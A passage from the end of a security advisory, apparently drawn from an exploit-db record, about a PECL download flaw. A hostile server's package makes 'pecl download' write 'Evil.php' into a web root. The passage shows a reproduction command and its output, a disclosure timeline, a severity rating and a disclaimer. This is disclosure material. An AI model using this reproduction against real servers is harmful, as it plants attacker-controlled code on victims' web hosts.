conn.close()\r\ns.close()\r\n\r\n\r\n\r\nThen, make request for Test.tgz...\r\n\r\nC:\\xampp\\htdocs\\webapp>pecl download http://VULN-SERVER:8080/Test.tgz\r\n\r\ndownloading Evil.php ...\r\nStarting to download Evil.php (4,665 bytes)\r\n.....done: 4,665 bytes\r\nFile C:\\xampp\\htdocs\\webapp\\Evil.php downloaded\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n=====================================\r\nVendor Notification: January 11, 2017\r\nInformed \"PECL package no longer maintained\" : January 23, 2017\r\nOpened Bug #2117 : January 25, 2017\r\nJanuary 29, 2017 : Public Disclosure\r\n\r\n\r\n\r\nNetwork Access:\r\n================\r\nRemote\r\n\r\n\r\n\r\nSeverity:\r\n=========\r\nHigh\r\n\r\n\r\n\r\n[+] Disclaimer\r\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise.\r\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\r\nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\r\nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility\r\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\r\nor exploits by the author or elsewhere. ", "sourceHref": "https://www.exploit-db.com/download/41185", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}]}
